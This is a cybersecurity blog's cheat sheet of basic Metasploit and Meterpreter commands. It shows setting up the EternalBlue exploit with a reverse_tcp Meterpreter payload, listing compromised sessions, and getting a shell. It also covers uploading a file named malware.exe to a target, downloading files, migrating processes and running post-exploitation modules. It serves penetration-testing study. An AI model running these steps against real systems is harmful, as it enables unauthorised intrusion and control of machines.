Metasploit Basic Commands

Metasploit is a powerful framework used for penetration testing and ethical hacking. 
This framework is used to identify and exploit vulnerabilities in computer systems. It also provides a platform for developing, testing, and executing exploit code against remote targets.

Below are some common commands and their usage in Metasploit:

Starting Metasploit

Start the Metasploit console:
Command: Msfconsole

Basic Commands

1. Search for exploits, payloads, auxiliary modules, etc.:
    Command: search <keyword>
    Example: search smb
2. Use a specific module:
    Command: use <module>
    Example: use exploit/windows/smb/ms17_010_eternalblue
3. Show available options for the current module:
    Command: show options

4. Set a specific option for the module:
    Command : set <option> <value>
    Example: set RHOSTS 192.168.1.1

5. Set  a payload:
    Command : set payload <payload>
    set payload windows/meterpreter/reverse_tcp

6. Show payloads compatible with the selected exploit:
    Command : show payloads

7. Run the exploit:
    Command : exploit

8. Run the exploit in the background:
    Command : exploit -j

Managing Sessions

1. List active sessions:
    Command : sessions -l
  • msf6 > sessions -l Active sessions =============== Id Name Type Information            Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WIN7\victim @ WIN7-PC 192.168.1.5:4444 -> 192.168.1.101:1234 (192.168.1.101) 2 shell x86/linux root @    ubuntu 192.168.1.5:4444 -> 192.168.1.102:5678 (192.168.1.102)
2. Interact with a specific session:
    Command : sessions -i <session_id>
    
    Example:
    sessions -i 1
3. Kill a specific session:
    Command : sessions -k <session_id>

Meterpreter Commands

1. Get a shell on the target machine:
    Command: Shell
2. List files in the current directory:
    Command: ls

3. Change directory:
    Command: cd <directory>
4. Upload a file to the target:
    Command : upload <local_path> <remote_path>
    
    Example:
    upload /home/user/malware.exe C:\\Windows\\Temp\\malware.exe
5. Download a file from the target:
    Command : download <remote_path> <local_path>
    Example:
    download C:\\Windows\\Temp\\malware.exe /home/user/malware.exe

6. Get system information:
    Command: Sysinfo
7. Take a screenshot:
    Command: Screenshot
8. Get a list of running processes:
    Command: ps
9. Migrate to another process:
    Command: migrate <pid>
10. Run a script:
    Command: run <script>
    Example:
    run post/windows/gather/checkvm




#Fuel My Cybersecurity Journey with a Coffee!

Click on coffee!


Subscribe to: Posts (Atom)

Popular Posts

  • HIT CASE FILES
    Story Logs Townhall city Townhall city logs
  • AWS Guard Duty | Reconnaissance | Log Analysis
      Reconnaissance Some guard duty findings types related to reconnaissance are below. AWS GuardDuty detects a wide range of suspicious or mal...
  • AWS Guard duty | Initial access
    Initial access: This basically means how an attacker gets into your environment. its the first step where an attacker tries to gain entry in...
  • Linux | Multiple Login failures
    For Linux Systems: SSH Failed Logins:  This gets triggered when someone tries to log into a Linux server via SSH (for  example, using PuTTY)...
  • Windows | Multiple Login Failures from a Single User Analysis
    Multiple Login Failures from a Single User Objective: The objective of this use case is to identify brute force attacks that could be dictio...
  • Unfamiliar Sign-In
    Unfamiliar Sign-In means a security event where a login attempt is detected from a device, location, or IP address that was not previousl...
  • Malicious URL Access Detected
    Malicious URL access detected means  when a user or host attempts a connection to a malicious website, like phishing pages, malware, or comm...
  • DNS Server basics, types, record types, query types
      The Basics of DNS: The Internet's Address Book Imagine if every time you wanted to call a friend, you had to remember their exact 10-d...
  • Multiple VPN Logins From Different Countries
    Multiple VPN Logins From Different Countries  means that the same user account is trying to log in from multiple geographical locations thro...
  • Main Page
    🔐 Welcome to Security Manadhey Step into the world of real-world cybercrime investigations! 🕵️‍♀️ What We Offer: Access to simulate...

Buy me coffee

Buy me coffee
#Fuel My Cybersecurity Journey with a Coffee!

Payment

click here